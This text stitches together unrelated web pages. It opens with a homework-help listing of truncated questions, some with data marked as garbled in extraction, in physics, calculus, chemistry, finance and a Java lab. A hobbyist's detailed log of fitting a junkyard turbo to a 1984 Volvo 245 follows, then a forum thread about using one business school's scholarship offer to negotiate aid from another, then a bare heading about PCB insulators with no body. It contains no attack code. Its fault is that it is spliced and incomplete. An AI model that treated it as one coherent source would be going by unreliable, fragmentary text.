{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.33568307757377625, "perplexity": 3826.2083987311253}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027313889.29/warc/CC-MAIN-20190818124516-20190818150516-00329.warc.gz"}
https://solvedlib.com/n/4-4-21find-particular-solution-to-the-differential-equation,15463008
# 4.4.21

Find a particular solution to the differential equation using the Method of Undetermined Coefficients.

x''(t) − 16x'(t) + 64x(t) = 2t e…

A solution is Xp(t) = ___

#### Similar Solved Questions

##### Three point charges on the x-axis

Three point charges are placed on the x-axis as follows: 22 μC at x = 0; 30 μC at x = 0.60 m; and −10 μC at x = 1.1 m. Part A: Find the net force on the 22 μC point charge. Assume the direction of the x-axis as positive. Express your answer to two significant figures and include the appropriate...

##### Question 2: compaction test

The following results were obtained from a standard compaction test. If the minimum allowed degree of compaction is 97.0%: plot the compaction curve; find the range of water content which can be applied; find the maximum dry density and corresponding optimum moisture content. Plot also the zero and 3% air voids curves. Take Gs = 2.80. [water content / dry density data table garbled in extraction]

##### Sulfuric acid and sodium carbonate

3) If sulfuric acid was added to sodium carbonate, which type of reaction would take place? Write a balanced reaction and a balanced net ionic equation for this reaction.

##### Hw12 July13: Problem 14

(1 point) Let A = [matrix garbled in extraction]. Find an orthonormal basis of the image of A.

##### Cisco annual revenue

Below is a graph displaying Cisco annual revenue for the years 1990–1999, with one trend line assuming the data is linear and another assuming it is exponential. Make a prediction of what the revenue would be for 2002.

##### QUESTION ONE

Conflict is sometimes misunderstood and interpreted wrongly by conflict managers and leaders of organizations. With appropriate examples, critically examine the misconceptions about conflict in organizations. (40 marks)

##### QUESTION TWO

Using your place of work or any organization you are fa...

##### Critical points

Find the critical points of the function f(x) [expression garbled in extraction]. Enter your answers in increasing order. If the number of critical points is less than the number of response areas, enter NA in the remaining response areas.

##### Linked Bag lab

In this lab, we will implement the Linked Bag. The bag will contain a sequence of strings. First, you need to design the Node class (Node.java). It will contain an integer data and a reference to the next Node. The constructor of the Node class receives an integer and assigns it to the data field. It als...
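The Linked Bag lab above asks for Java (Node.java), but the data structure itself is language-independent: a bag is an unordered collection, so new items can simply be pushed onto the head of a singly linked list. Here's my own illustrative sketch in Python, with hypothetical class and method names rather than the assignment's required API:

```python
class Node:
    """A single link: holds a data value and a reference to the next Node."""
    def __init__(self, data, next_node=None):
        self.data = data
        self.next = next_node


class LinkedBag:
    """An unordered bag backed by a singly linked list."""
    def __init__(self):
        self._head = None
        self._size = 0

    def add(self, item):
        # Insert at the head: O(1), and order doesn't matter in a bag.
        self._head = Node(item, self._head)
        self._size += 1

    def __contains__(self, item):
        # Linear scan down the chain of nodes.
        node = self._head
        while node is not None:
            if node.data == item:
                return True
            node = node.next
        return False

    def __len__(self):
        return self._size


bag = LinkedBag()
for word in ["red", "green", "red"]:
    bag.add(word)
```

Note that a bag, unlike a set, keeps duplicates: adding "red" twice yields a bag of size 3.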
##### Spring-mass motion

(1 point) A spring with spring constant k of 100 pounds per foot is loaded with a 1-pound weight and brought to equilibrium. It is then stretched an additional inch and released. Find the equation of motion, the amplitude, and the period. Neglect friction. Then y(t) = ___, where t is time in seconds and y(t) is displacement in feet. Amplitude: ___ inch(es). Period: ___ second(s).

##### Upper body strength test

A physical education department wanted a single test of upper body strength that was easy to administer. Dips on the parallel bars and pull-ups on the horizontal bar were considered good tests. One faculty member thought that both tests were not needed because the correlation between the two was pro...

##### Region bounded by a parabola and a line

Consider the region bounded by the parabola and the line (see figure). Find the area of this region by integrating with respect to x. Find the area of this region by integrating with respect to y.

##### Question 2: traffic study

A traffic study of an urban freeway corridor identified the locations with the highest incidence of crashes. The corridor includes three freeway segments and three interchanges. Using the crash data and traffic volumes tabulated below,
rank the interchanges by number of crashes per year per million vehicles for each interchange, from highest to lowest. [interchange/segment crash and volume table garbled in extraction]

##### Common Core Standards

Imagine you are a Kindergarten teacher explaining the Common Core Standards to a group of families by responding to the following three questions. Reference course/unit material in your post. Please make sure to use APA format when you reference materials. Why is it called the "Common Core"...

##### Evaluating claims of cures

After reading this chapter, think of how you will proceed next time you read an allegation of a cure for or improvement of a condition, and how likely you are to believe it. What would you require to give it v...

##### Blackbody radiation of the human body

The human body acts as a nearly perfect blackbody with emissivity ε = 0.97. The energy given off as thermal radiation is produced by metabolizing the food we eat. a.) Assuming the temperature is 310 K and the surface area given by a cylinder of 175 cm height and 13 cm radius, calculate the total energy in kilocalories given off by a typical human body in a single 24-hour period. How does this compare to the typical dietary requirements for a human being? b.) Assuming that the environment around us is a...
##### NMS

What body systems are associated with NMS?

##### Compound inequality

Solve and graph each solution set. −7 ≤ 4x + 5 ≤ 13

##### Question 9: beam shear

Consider the following beam, pinned at its left end with a roller support at its right end. The beam is loaded with P1 = 22 N and P2 = 44 N. The absolute maximum value of the internal shear force (N) in the beam is nearest to: 60, 40, 45, 55, or 50.

##### Relative velocity

A science student is riding on a flatcar of a train traveling along a straight horizontal track at a constant speed of 10 m/s. The student throws a ball into the air along a path that he judges to make an initial angle of 60.0 degrees with the horizontal and to be in line with the track. The student...

##### Green's Theorem

Apply Green's Theorem to evaluate the integral ∮_C (y + x) dx + (y + x) dy, where C is the circle (x − 5)² + (y − 3)² = 4. (Type an exact answer, using π as needed.)

##### Check solutions

Check each proposed solution by direct substitution or with a graphing utility. ln(ln x) = 0

##### Right endpoint approximation

[20 points] Consider the function f(x) = x² − 4x + 5 over the interval [3, 7]. Let S be the region under the graph of f(x) over the interval [3, 7]. Right endpoint approximation using k = 4 rectangles.
Use the right endpoint method to approximate the area of the region S using four equally wide rectangles. That is: sketch the function and shade in the desired area; in a second sketch, draw the four rectangles approximating the desired area; compute the total area of the four rectangles.

##### PEST analysis

Examine how the PEST can be used by a marketer to understand changes in the external environmental forces affecting a company.

##### Complex rational expression

Simplify each complex rational expression by the method of your choice. $\frac{\frac{12}{x^{2}}-\frac{3}{x}}{\frac{15}{x}-\frac{9}{x^{2}}}$

##### Future value (need help with B, C, D)

Question 1 (20 points) a) Calculate the future value of $20,000 invested now (time zero) for 5 years. It grows at a rate of 3% per year compounded annually. b) How much money will you have 25 years from now, if you deposit $1,000 into a bank account at the end of each year...

##### Linear approximation

Use linear approximations to estimate the following quantities. Choose a value of a to produce a small error. $e^{0.06}$

##### Slope

How do you find the slope for (2, −7), (0, −10)?
##### Question 10 (2 pts)

In the context of the Leadership Grid, the ___ desires tight control in order to get tasks done efficiently and considers creativity and human relations unnecessary. Options: authority-compliance manager; country club manager; impoverished manager; organization man manager.

##### ASWSBE13 12.E.013

You may need to use the appropriate technology to answer this question. Health insurance benefits vary by the size of the company. The sample data below show the number of companies providing health insurance for small, medium, and large c...

##### Organic transformations

Supply the starting material(s), reagent(s), or product(s) for the following transformations (2 pts. each): dilute NaOCH3/CH3OH, heat; dilute NaOCH3/CH3OH; 1. NaOEt, EtOH, 2. H3O+; 1. HN(CH3)2, pH 4, 3. H3O+. Draw a stepwise synthesis for the following from the SMs provided as your only source of carbon (2 pts). [structures garbled in extraction]

##### Implicit plane

(1 point) An implicit equation for the plane passing through the points (3, 0, 2), (−3, 4, 2), and (0, −3, 5) is ___.
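Several of the exercises above are easy to sanity-check numerically. The following Python sketch is my own verification, not part of any of the original questions:

```python
import math

# Slope through (2, -7) and (0, -10): rise over run.
slope = (-10 - (-7)) / (0 - 2)          # -3 / -2 = 1.5

# ln(ln x) = 0  =>  ln x = 1  =>  x = e.
residual = math.log(math.log(math.e))   # 0.0

# Linear approximation of e^0.06 about a = 0: e^x ~ 1 + x.
approx = 1 + 0.06                       # 1.06, vs. the true value ~1.0618

# Green's theorem for the integral of (y+x)dx + (y+x)dy around the
# circle (x-5)^2 + (y-3)^2 = 4: dQ/dx - dP/dy = 1 - 1 = 0, so the
# exact answer is 0. Confirm with a midpoint-rule walk around the circle.
N = 10_000
total = 0.0
for k in range(N):
    t0 = 2 * math.pi * k / N
    t1 = 2 * math.pi * (k + 1) / N
    x0, y0 = 5 + 2 * math.cos(t0), 3 + 2 * math.sin(t0)
    x1, y1 = 5 + 2 * math.cos(t1), 3 + 2 * math.sin(t1)
    xm, ym = (x0 + x1) / 2, (y0 + y1) / 2
    total += (ym + xm) * (x1 - x0) + (ym + xm) * (y1 - y0)
```

For this particular field the midpoint sum telescopes (the field is the gradient of xy + x²/2 + y²/2), so `total` comes out at zero up to floating-point rounding.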
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5831393003463745, "perplexity": 2780.0336730181443}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662510138.6/warc/CC-MAIN-20220516140911-20220516170911-00181.warc.gz"}
https://forrestbourke.com/turbo.html
## Installing a Junkyard Turbo in my 1984 Volvo 245

Latest Update: 7/1/20

# Intro

This is a build log that will explain how I added a turbocharger to my existing engine. I will include what I've spent on parts, identify mistakes to avoid, and hopefully provide a comprehensive guide for anyone planning a similar project.

###### Note: Amazon links are affiliate links. Other sites are not. I've only linked things I've actually bought and used myself. All of the Amazon links donate 0.5% of the purchase price to the charity of your choice through Amazon Smile. If you haven't signed up, it'll ask you to pick a charity before redirecting you to the product. Neither of these features changes the price you pay.

## B23 Engine with a B230 Turbo

We started the turbo build at 300,500 miles on the car. As far as I know, this is the original engine, a 1984 B23F (Wikipedia Link). Since the car came with Volvo's M46 manual transmission, the compression should be 9.5:1 and the stock power and torque numbers would've been 113hp at 5400 RPM and 136 ft-lbs at 2750 RPM. As far as I know, 1983 and 1984 were the only two years Volvo used Bosch LH2.0 fuel injection, switching to LH2.2 and then LH2.4 in the latter years of the 240. 1984 was also the last year before Volvo switched to the B230, featuring slightly different internals. I'm far from an expert, just summarizing info from around the web.

I bought the car in 2018 with 282,000 miles, and the 18k we've put on it since have certainly not been easy miles. Prior to the turbo, it wasn't fast enough to get out of its own way. It wasn't powerful out of the factory, and the 300k miles after that certainly didn't increase the power.
What sealed the deal on adding the turbo was struggling to get up hills off-road in Baja — we had the clearance, we just didn't have the power to make it up the steeper hills (Note: we could've also fixed this with lower rear end gearing, a lower first gear in the transmission, or an add-on transfer case, but a turbo seemed like the easiest, cheapest, and most well-traveled path). The turbo journey started on July 4th, 2019. Hans, an excellent friend and accomplished amateur mechanic, accompanied me to the Tumwater, WA junkyard to pull a turbo from a Volvo 740 turbo. Pick-n-Pull is spotty about labeling turbo models, so I made sure to check the VIN before driving out to the junkyard. This was actually my second try at finding a junkyard turbo. Some Thursday in March, I called another Pick-n-Pull about a turbo Volvo and confirmed it hadn't been crushed — but by the time I got there on Saturday, the top had been crushed/cut off and the car was used as a bin for other trash. In addition to talking to friends and the Turbobricks Facebook group, this Turbobricks post by 740atl was incredibly helpful. I'd advise reading that post all the way through several times before embarking on this journey. If for whatever reason that thread is down, here is a PDF Link.

#### Disappointment

This car had been completely mined for parts. The only potentially useful part was an intercooler pipe, but I left it behind; I figured I could get the whole setup at once. Special shout-out to the employee in the picture above, who yelled at me for climbing into the area with said crushed car to look for parts, where I wasn't supposed to be. The second Pick-n-Pull trip in July was much more successful. I nervously opened the hood of this second Volvo 740 turbo to find an untouched engine. Success at last!

#### Success!
Hans and I proceeded to pull the following from the donor 740:

• Turbo, including the attached exhaust manifold, downpipe, oil hard lines, and coolant hard lines
• Intercooler and associated hard & soft piping
• Oil cooler and input fittings, cutting the hoses. This was a mistake, as I detail later on – I should've taken the oil cooler, hoses, and the oil filter adapter plate from the donor car.
• Fuel rail and fuel injectors (we ended up not needing the latter; as explained below, I used high impedance injectors, which are easier to wire)
• LH2.4 Fuel Computer and EZK Ignition Computer. We used neither; changing an early engine to LH2.4 is daunting because adding a crank position sensor requires drilling and tapping holes in the engine block.

We didn't pull the oil cooling adapter/oil filter relocation because I didn't know how easy it was to remove from the car. This was, again, a mistake. The total cost for the parts from Pick-n-Pull was $250, including about $50 in core charges (none of which I got back), because we went on the 4th of July, which was a half-off day. On a "normal" day, the parts would've been $500. In my opinion, that's a bit steep for junkyard turbo parts off of a 233k mile car - we could've gotten the price down a bit by being smarter with the things we got, i.e. getting fewer things and getting more of the things we needed, but going on a 50% off day was key.

#### Oil cooler adapter

We left this behind from the donor car, but that was a mistake.

#### Remember not to start the car without oil

# Mechanical Bits

## Oil Drain

For the oil drain, I bought a kit on eBay called MAMBA Turbo Oil Feed & Return Drain Line Kit For VOLVO 740 940 TD04H-13C 49189 for $75. It came via incredibly fast DHL shipping from Taiwan (2 days) — I've had parts take longer to come from California. As it turns out, this kit was a poor choice for my application.
I wasn't able to use the drain line at all because it was intended for a stock turbo block with the drain press fit using an o-ring seal (I gave the drain line away). My 1984 B23F block didn't have the oil drain hole or the casting to drill a hole. Even if it did have the casting, I wasn't interested in drilling the block — attempting to clean the chips out of the crankcase seemed like a recipe for disaster. The parts that I was able to use from the kit were the 10-AN flange for the turbo oil drain, and the banjo bolt and 4-AN oil feed line (described in the next section). I got a 10-AN bulkhead fitting from Amazon and used a step drill to make a hole in the oil pan below the baffles. As it turned out, I chose a bad place to make the hole.

#### Don't put the fitting here

The fitting interfered with the cover that installs between the engine and the transmission. I'm not sure if this is M46-only, and it looks like we might have been able to leave the cover off, but I chose to cut a notch to avoid the fitting. If you're smarter than me, you'll drill the hole a few inches forward so that it doesn't interfere with the transmission cover. Removing the oil pan was a real pain. We ended up disconnecting the subframe via the two bolts on either side (using long extensions for the ones under the brake master cylinder) and then jacking the engine up on the crank pulley and putting blocks between the cross-member and the frame. It was a little sketchy, but we got the pan out eventually. We broke off about two inches of the rubber hose next to the oil pickup. I didn't bother replacing it at the time, but I've since replaced it when I fixed the leaky bulkhead fitting. It would be wise to pick up this drain hose when you're working with the oil pan off. Mine was very crusty after 30 years and would've been next to impossible to remove without access from the bottom.

## Oil Feed

For the oil feed, on the turbo side, I used the banjo bolt and hose from the eBay MAMBA kit.
On the block side, I used a -4AN to 1/8 NPT fitting to first adapt the feed line and then a 1/8 NPT brass tee to keep the stock oil pressure sensor. Clocking this tee fitting carefully was needed to clear the oil filter sandwich plate and the alternator. I had to screw the tee into the block and then the oil pressure sender into the tee — when I first installed it, the assembly spewed a puddle of oil under the car because I didn't tighten it or install the pipe tape properly. All the NPT fittings need pipe tape, but the AN fittings seal with the flare and don't need tape. B23 blocks like mine have a 1/8 NPT oil pressure sensor feed, but B230 and other blocks might have different fitting sizes.

## Oil Cooler

Don't set up the oil cooler the same way I did. The stock 740 turbo setup has an oil filter adapter that moves the oil filter towards the back of the car and hard lines that run forwards towards the oil cooler and then midway become crimped-on rubber hoses into right angle fittings in the oil cooler. At the junkyard, I cut the rubber hoses above the fittings on the oil cooler side from the donor car. Instead, either remove the oil filter adapter, hard lines/flex hose assemblies, and oil cooler from the donor car as an entire system, or use an aftermarket sandwich plate plus an aftermarket oil cooler. I didn't do either of these. I used:

1. an aftermarket sandwich plate ($15 on eBay; they come in several colors),
2. "Evil Energy" brand nylon 10-AN hose and fittings, from Amazon. I was dumb and bought a 10ft kit and then a 16ft kit, because I ran out of fittings. Note: these were all 10AN kits with black and red fittings when I bought them, but it looks like some of them have changed to black/black fittings, and not all of them have 10AN in stock. Don't follow the links blindly, since Amazon 3rd party sellers and Amazon itself change inventory all the time; make sure you're getting the right hose.
3. and the stock oil cooler.
The stock oil cooler uses arcane fittings called 1/2" BSP. I was unable to find 1/2" BSP to -10AN adapters, so I had to stack two adapters: first 1/2" BSP to 1/2" NPT, and then 1/2" NPT to -10AN.

#### I really wouldn't recommend doing this

Also, this picture is wrong because the NPT to NPT connection in the middle needs pipe tape.

This whole stack is really dumb, and I wouldn't recommend doing this at all. The stack of fittings alone cost $35 total, which is almost enough to get an aftermarket 10AN oil cooler. There are kits that have the hoses, fittings, sandwich plate, and oil cooler all together. To mount the oil cooler, I took off all the stock mounting brackets and just bolted it a few inches behind the grill. I can't comment on cooling performance because I haven't had the car in any temperature stressing situations and I haven't installed an oil temperature gauge. I'll install an eBay one soon using the two ports in the aftermarket oil filter sandwich plate. These ports were not on the stock filter adapter, so I suppose that's one advantage of using an aftermarket sandwich plate instead of the stock filter relocation adapter. One other potential advantage is being able to use the ports on the sandwich plate for the feed line into the turbo, but I found the routing was easier from the oil pressure sensor port.

## Coolant Feed

The coolant for the turbo feeds in from the lower radiator hose to the bottom of the turbo and out the top of the turbo to the hose that goes to the bottom of the coolant overflow tank. This is to promote the thermal siphon effect — you can read more at Garrett's website. Luckily, Volvo 740 hoses work pretty well. The lower hose was about $19 and the upper hose was about $15. I grabbed these hoses from the donor car, but I figured it would be best to use new rubber since these hoses tend to crack eventually. Installing the hoses was a little tricky.
I had to cut a few inches off the lower hose as well as the upper hose, and it's not totally obvious which direction the lower hose goes. In the photo, I had installed the hose backwards, and consequently the feed to the turbo is kinked. It's not obvious (or at least it wasn't to me), but the feed to the turbo points down before curving around and going to the hardline coming out of the turbo. I had to flip the lower radiator hose a few times and cut an inch or two off the end of the feed line as well to get everything to mate up. The upper feed line was fairly easy to attach, but I switched from the rectangular 240-style coolant overflow reservoir to the round 740-style coolant reservoir. I'd imagine it's possible to keep the original 240 tank, but that would leave less clearance for the MAF sensor and air filter. I removed the windshield wiper fluid tank as well, because it took up a ton of space where the air filter now sits. Eventually, I'll return my attention to the washer fluid and fit a smaller bottle, but it's not at the top of the priority list currently.

## Fuel Rail & Injectors

Turbo cars and all LH2.4 cars use a 3bar (43 PSI) fuel pressure regulator. I believe LH2.2 and LH2.0 N/A cars used a 2.5bar regulator, as well as a different fuel rail for LH2.0. I replaced my original rail with the fuel rail from the donor car. It bolted right on to the manifold, and the fitting for the fuel input from the filter fit. The only issue was that I had to fashion a sealing cap for the connection to the cold start injector, as my manifold doesn't have one. I replaced the fuel pressure regulator with a 3.0 bar regulator from eBay. Do not buy the one at this link. Mine failed after less than a month — fuel was pouring out of the vacuum port. For fuel injectors, I ordered a set of five from eBay, intended for an 850 turbo. These are high impedance injectors, so they can be connected directly to the harness.
One of the green injectors from the donor car was a bit melted (maybe a bad sign? or maybe that's why the car was in the junkyard in the first place?), so even if I had wanted to use those low impedance green injectors, I would've needed to get a new set in addition to the resistor pack. I kept all the green injectors from the junkyard car, but I should have tossed them back in the car and taken just the rail.

I struggled for several weeks trying to figure out why my car would sometimes not start, why it would sometimes stumble, and why it would occasionally make "pops" going lean when held at 2000-3000 RPM. It turned out that the threads on the intake manifold that hold the fuel rail and the injector grounds were stripped, causing the ground to make intermittent connection. This was a really frustrating problem to troubleshoot, since it was so intermittent and felt like ECU or MAF sensor issues.

#### Cold start injector cap

I don't know the size of this fitting, but if I did, it would be a nice place to put a fuel pressure sensor.

## Intercooler, Radiator, and Electric Fan

I used the junkyard intercooler and a new Nissens radiator from FCP Euro that had a built-in fan switch. Unfortunately, the fan switch was set at a higher temperature than the thermostat, so it pulsed the fan on and off as the car overheated. To resolve this, I wired the fan switch in parallel with a switch in the dash, so the driver can force the fan on regardless of the temperature switch in the radiator. With the switch on, the car seems to stay cool idling, but we haven't had it in hot weather. I've since changed to an adjustable fan thermostat that sticks into the vanes of the radiator. So far it seems to be working well, though the way it's wired, it will keep running the fan after the car is off until the radiator cools down.
I'm not 100% sure what model the e-fan is (I got it from a friend), but based on the size and the looks, I think it's the 16-inch fan mentioned on Dave Barton's Electric Fan Page. I 3D printed little spacers to mount the fan on the radiator and drilled holes to match the radiator tabs. Unfortunately, I didn't pick up the turbo intercooler/radiator mounts from the junkyard car, so I put the stock rubber radiator mounts on the intercooler, baling-wired the radiator to the intercooler on the bottom, and "fabricated" steel mounts for the top that bolt into the original locations. My first set of 3D printed spacers wasn't tall enough, so the center of the fan chewed through the radiator and caused a leak. I replaced the radiator and printed longer spacers. After removing the mechanical fan and clutch, I replaced the studs in the water pump pulley with M6 bolts and washers to add a little clearance and remove the hand-shredding capability of the exposed pulley studs.

## Engine Control Unit (ECU) and Wiring Harness

The ECU and harness caused a lot of problems. When I embarked on the project, I mistakenly thought that the car was LH2.2 and that a simple swap of the ECU, MAF, and injectors to LH2.2 turbo parts would work. This was wrong: my car was originally LH2.0, which has the same connectors for the MAF and computer as LH2.2, but not the same pinout. That means any computer and any MAF can be plugged into any wiring harness, but only the correct ones will work together. We plugged in the new LH2.2 MAF and computer and immediately fried the computer; in fact, we did it twice and fried two computers. I'm lucky to have friends who swapped the LH2.2 harness with my stock LH2.0 harness while I was gone on vacation (they wanted me to stop complaining about my broken project). After the harness swap, we were finally able to get the car running.
## Ignition

My car came from the factory with the Chrysler ignition system, using the computer with the vacuum line that sits on the washer fluid bottle. I swapped to a Bosch Breakerless ignition from an eighties 240 Turbo by replacing the distributor, coil, and computer. I pulled the EZK ignition computer from the donor car, but not the rest of the harness and system that I'd need to change my car over to the EZK system. The Bosch Breakerless system was fairly easy to install, though I put it where the stock coil was (on the strut next to the battery) instead of where the harnessing emerged at the rear passenger side of the engine bay. The tachometer didn't work for a while because I hadn't realized that the signal wire emerged in this location. The solution was to run a tach wire from where the LH2.2 harness ended (near the wiper motor) over to the coil.

## MAF (Mass Air Flow) Sensor

I used a junkyard LH2.2 MAF (whose part number ends in -007). I initially tried several MAFs, and only found success with the LH2.2 MAF. Though LH2.0, 2.2, and 2.4 use the same physical connector, they're not pin compatible and only work with their respective injection systems. The LH2.0 MAF has a metal body and case, whereas the LH2.2 and 2.4 MAFs have injection molded plastic cases. It's possible to distinguish the LH2.4 from the LH2.2 MAF because the latter has an adjustment/calibration screw.

## PCV System

It took me a little while to figure out the PCV system, but it ended up being fairly easy. I used a rubber hose to connect the oil separator box (hidden under the intake manifold) to the turbo compressor inlet pipe. There's an orifice with a connector on it that accepts the hose. I'm told that the connector is for heating or atomizing the oil coming through the pipe, but I've yet to try connecting it. I first tried cleaning out my stock oil separator box, but they're cheap enough that replacement is the best option, especially if the intake manifold is off for another reason.
## Wideband O2 Sensor

Even though I don't have huge tuning goals for this car, a wideband O2 sensor seemed like a good safety precaution and debugging tool. Knowing whether the engine is running rich or lean is incredibly important for the first few runs of the engine, as well as later when trying to tune for the best performance. I bought an AEM wideband that came with a Bosch sensor and a weld-on bung. Since the 740 downpipe had to be cut and welded shorter to clear the firewall, we used this opportunity to add the wideband bung. We positioned the wideband sensor about 12 inches down the pipe from the turbo. The narrowband sensor remained in the stock location, much closer to the turbo outlet.

## Exhaust

I pieced together the exhaust from several junkyard exhausts. The stock 740 downpipe has a diameter of 2.25". We cut and shortened the flat section of the downpipe right after the turbo flange by about 1" so it would clear the firewall. For several months, I drove the car with no exhaust, just an open downpipe under the passenger floor. The open downpipe is fun for a week or two, but after a while, wearing earplugs on the freeway gets annoying.

I was lucky to find an over-axle 240 exhaust at Pick-N-Pull. I'm not sure if this was ever a stock option or if I was just lucky enough to find someone's custom exhaust. I decided to add a flex section after the downpipe because it seemed like a good idea. Unfortunately, I misremembered the size of the downpipe and got a 2.5" flex section instead of 2.25". I used a coupler to step up from the downpipe to the flex, and then another coupler to step down from the 2.5" flex section to the 1.875" stock exhaust. I used just the center muffler, since the turbo muffles some of the sound and I don't want the totally silent stock sound. Just the center muffler has a fairly conservative sound; I'd imagine running a straight pipe to the back of the car would have a more aggressive but not overly loud sound.
I did notice a little less throttle responsiveness with the exhaust completed compared to the open downpipe; at some point I might install either an electric or a manual cutout before the muffler. The open downpipe is perfect for rallycross.

#### Exhaust in the welding process

Though it's been fixed now, we did have one serious problem (on the 2020 WA Gambler 500). The exhaust fell apart at the over-axle connection to the resonator, meaning the hot exhaust pointed directly at the fuel tank. The car would repeatedly quit running after a few minutes, especially while driving slowly. We don't have absolute proof this was the problem, but it seems likely that the exhaust and the hot weather contributed to vapor locking the motor. We cut the exhaust off during that event to get home (which did resolve the problem) and then welded it back on more securely after getting home.

## Vacuum Connections

I wanted to make a log of all the vacuum connections, because it took me a little bit to figure out where to put them. There are connections before and after the throttle body, which see vacuum at different times, and the distinction is important for some of the connections. For example, if the turbo CBV is connected to the side before the throttle body, it won't function at all, since it won't see the vacuum in the manifold when the throttle is shut. Fun fact: while writing this section, I thought about how the vacuum advance is supposed to work and moved the vacuum advance from before the throttle body to after, using a tee from the fuel pressure regulator line. The car appears to idle a little better now.

My exact setup is a little odd because it never existed from the factory. Early 80s turbo 240s used the Breakerless ignition but not LH2.2, and LH2.2 cars from the late 80s used EZK ignition.
#### Before the Throttle Body

- Charcoal Canister (two hoses)

#### After the Throttle Body

- Vacuum/Boost Gauge
- Cabin HVAC Vacuum Line
- Turbo CBV/Blow-off Valve
- Fuel Pressure Regulator
- Brake Booster

# Reverse "Budget"

Here's a rough accounting of all the parts I bought for this project.

| Item | Cost |
| --- | --- |
| Turbo, Manifold, Intercooler, Pipes, Oil Cooler, etc. from Pick-N-Pull (50% off) | $250 |
| Bosch Breakerless Ignition, LH2.2 Harnesses, and Electric Fan from a friend | $100 |
| AEM Wideband O2 Sensor | $162 |
| Oil Pan Gasket | $13 |
| -10 AN Fittings and 10 ft of nylon hose | $82 |
| Oil Feed and Drain Line Kit | $80 |
| Boost Gauge | $15 |
| Fuel Injectors | $88 |
| Exhaust Gaskets & Spark Plugs | $17 |
| BSP to AN Fitting Stack | $35 |
| Manual Boost Controller | $15 |
| Oil Sandwich Plate | $17 |
| 740 Coolant Hoses with Lines for Turbo | $30 |
| -10 AN Fittings and 16 ft of nylon hose (I should've gotten this kit from the beginning) | $120 |
| K&N Cone Air Filter | $27 |
| More Spark Plugs | $10 |
| 3 Bar FPR | $13 |
| Fan Switch | $10 |
| Helicoil Kit (M8) | $25 |
| Bosch Narrowband O2 Sensor | $75 |
| Another 3 Bar FPR | $25 |
| New 740-style Coolant Reservoir | $22 |
| Nissens Radiator | $127 |
| Coolant Temp Gauge | $27 |
| Oil Temp Gauge | $12 |

# List of Mistakes

Here are all the mistakes that we made that you should avoid making:

- Not getting the entire factory oil cooler setup from the donor car
- Not getting the radiator/intercooler bottom rubber mounts from the donor car
- Not getting the coolant reservoir from the donor car
- Cutting instead of unplugging the O2 sensor from the donor car
- Assuming the car's existing harness was compatible with LH2.2 (really, the mistake here is that I didn't know there was a difference between LH2.0 and LH2.2)
- Not using pipe tape on NPT fittings
- Not checking the fuel injector grounds to the manifold
- Not checking the fuel line for kinks
- Not having the vacuum connections hooked up (or hooked up correctly)
- Not capping the intake hose IAC port
- Putting the ignition system in the wrong place, and not giving the fuel computer the tach (coil negative) input
- Pointing the exhaust at the gas tank (accidentally)
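The reverse budget never totals itself, so here's a quick sketch that sums the line items exactly as listed above (item names abbreviated):

```python
# Total up the reverse "budget" line items from the table above.
costs = {
    "junkyard turbo parts haul (50% off)": 250,
    "ignition, harnesses, e-fan from a friend": 100,
    "AEM wideband O2 sensor": 162,
    "oil pan gasket": 13,
    "-10 AN fittings + 10 ft nylon hose": 82,
    "oil feed and drain line kit": 80,
    "boost gauge": 15,
    "fuel injectors": 88,
    "exhaust gaskets & spark plugs": 17,
    "BSP to AN fitting stack": 35,
    "manual boost controller": 15,
    "oil sandwich plate": 17,
    "740 coolant hoses": 30,
    "-10 AN fittings + 16 ft nylon hose kit": 120,
    "K&N cone air filter": 27,
    "more spark plugs": 10,
    "3 bar FPR": 13,
    "fan switch": 10,
    "Helicoil kit (M8)": 25,
    "Bosch narrowband O2 sensor": 75,
    "another 3 bar FPR": 25,
    "new 740-style coolant reservoir": 22,
    "Nissens radiator": 127,
    "coolant temp gauge": 27,
    "oil temp gauge": 12,
}
total = sum(costs.values())
print(f"Total spent: ${total}")  # Total spent: $1397
```

Under $1400 all in, which is part of why I'd still call this a budget build despite the fitting-stack regrets.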
Negotiating fellowship strategies

Intern (joined 17 Feb 2010) | 30 Mar 2013, 13:58

Has anyone had luck leveraging a scholarship from one school to get extra aid from another? I have a friend who was able to do this, but I'm wondering if others have, and what their strategies were. Did you explicitly write to the office and mention another offer? Did you just ask for additional aid? I want to be very careful and not be too forceful; I am obviously very lucky to be in this situation. But if anyone has thoughts on this, let me know. I'd especially like to hear from people who have tried to do this (successfully or otherwise).

Manager (joined 17 Jun 2012) | 30 Mar 2013, 17:04

Interested in this as well, because Anderson has offered me $ but I'd like to head to Booth or SOM (no $ from either). I'm going to at least ask for a re-evaluation, and it'd be great to hear some insights.
# Thinnest insulator between metal case and PCB?

